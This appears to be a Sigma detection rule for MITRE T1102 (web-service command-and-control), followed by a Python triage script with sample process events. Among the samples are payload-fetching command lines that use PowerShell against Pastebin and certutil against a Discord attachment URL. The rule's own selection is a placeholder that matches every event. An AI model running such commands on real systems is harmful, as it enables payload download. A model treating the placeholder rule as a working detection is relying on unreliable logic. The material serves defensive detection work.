title: Web Service (T1102)
id: df00tech-t1102
status: experimental
description: "Adversaries may use an existing, legitimate external web service as a means for relaying data to/from a compromised system. Popular websites and cloud services such as Google Drive, OneDrive, Dropbox, Pastebin, GitHub, and Discord may act as C2 channels due to the high likelihood that hosts within a network already communicate with them. This provides cover in expected noise and takes advantage of SSL/TLS encryption offered by these providers. Use of web services also protects back-end C2 infrastructure from discovery through malware binary analysis while enabling operational resiliency through dynamic infrastructure changes."
references:
  - https://attack.mitre.org/techniques/T1102/
  - https://df00tech.com/detections/T1102
author: df00tech
date: 2026/04/14
tags:
  - attack.t1102
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Legitimate developer tools or CI/CD pipelines making API calls to GitHub, Firebase, or Google APIs"
  - IT management tools and monitoring agents that poll cloud APIs for configuration or telemetry upload
  - "Custom line-of-business applications built on cloud storage APIs (OneDrive, Google Drive SDK integrations)"
  - PowerShell scripts used legitimately by administrators to upload logs or reports to cloud storage
  - Antivirus or endpoint agents uploading telemetry to cloud-hosted collection endpoints
level: medium
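As an added defender-side illustration, not the df00tech rule's own logic (its KQL/SPL query is not reproduced here), the following Python triages constructed Sysmon-style process_creation events for command lines that reference the services named in the description, allowlisting the developer-tool case listed under falsepositives; the allowlist, the LOLBin set and the sample events are assumptions for this example.

```python
import re
from urllib.parse import urlparse

# Web services named in the rule description. A reference to one is only a signal;
# the verdict depends on which process made it.
WEB_SERVICES = {"drive.google.com", "onedrive.live.com", "dropbox.com", "pastebin.com",
                "github.com", "raw.githubusercontent.com", "discord.com", "discordapp.com"}
# Assumed allowlist covering the rule's listed false positives (developer tooling);
# extend it with sanctioned CI, agent and line-of-business images and hosts.
ALLOWED = {("git.exe", "github.com"), ("git.exe", "raw.githubusercontent.com")}
# Built-in download-capable binaries whose outbound use of these services is unusual.
LOLBINS = {"powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def service_hosts(cmdline):
    """Return the listed web-service domains referenced by URLs in a command line."""
    hosts = set()
    for url in URL_RE.findall(cmdline):
        host = (urlparse(url).hostname or "").lower()
        hosts.update(s for s in WEB_SERVICES if host == s or host.endswith("." + s))
    return hosts


def evaluate(event):
    """Classify one process_creation event; returns (verdict, matched_hosts)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    hosts = service_hosts(event["CommandLine"])
    if not hosts:
        return "none", hosts
    if all((image, h) in ALLOWED for h in hosts):
        return "allowlisted", hosts
    return ("suspicious" if image in LOLBINS else "review"), hosts


# Constructed Sysmon-style events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Git\cmd\git.exe",
     "CommandLine": "git.exe clone https://github.com/example/repo.git"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://pastebin.com/raw/EXAMPLE"'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f https://cdn.discordapp.com/attachments/0/0/x.bin x.bin"},
    {"Image": r"C:\Program Files\LOBApp\sync.exe",
     "CommandLine": "sync.exe --remote https://api.onedrive.live.com/v1.0/drive"},
]


def triage(events=SAMPLE_EVENTS):
    """Return (verdict, image basename, hosts) for each event that referenced a listed service."""
    results = []
    for e in events:
        verdict, hosts = evaluate(e)
        if verdict != "none":
            results.append((verdict, e["Image"].rsplit("\\", 1)[-1].lower(), sorted(hosts)))
    return results
```

A "review" verdict is the tuning hook: once an image such as the LOB sync client above is confirmed legitimate, add its (image, host) pair to ALLOWED rather than suppressing the whole host.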
